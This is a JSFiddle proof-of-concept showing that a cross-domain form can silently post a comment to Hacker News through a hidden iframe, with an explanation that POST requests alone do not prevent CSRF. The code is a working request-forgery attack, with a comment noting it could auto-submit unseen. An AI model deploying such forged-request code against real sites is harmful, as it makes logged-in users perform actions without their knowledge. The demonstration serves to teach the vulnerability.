JSFiddle - React, Tailwind, and code Playground
HTML
<form id="form" target="frame" method="post" action="https://news.ycombinator.com/r">
<input type=hidden name="fnid" value="XTNwn3voB9">
<textarea name="text" rows=6 cols=60>
`<form>`s are allowed to send POST requests to wherever they want, without any restrictions. By creating a form that points to another domain, and automatically submitting it, you can send a POST request to wherever you want [1].
POST requests can be easily sent cross-domain. NO ONE SHOULD EVER think that just because he's not using GET requests he's safe from CSRF attacks.
[1] See http://jsfiddle.net/8xnB3/5/ for example (which sent this comment).
</textarea>
</form>
<iframe id="frame"></iframe>
<button id="submit">Submit</button>
CSS
iframe { display:none; }
JavaScript
$('#submit').click(function(){
// Could as easily bind to document ready event and automatically
// submit it. Its sent to an invisible frame, so the user won't
// see a thing.
$('#form').submit()
})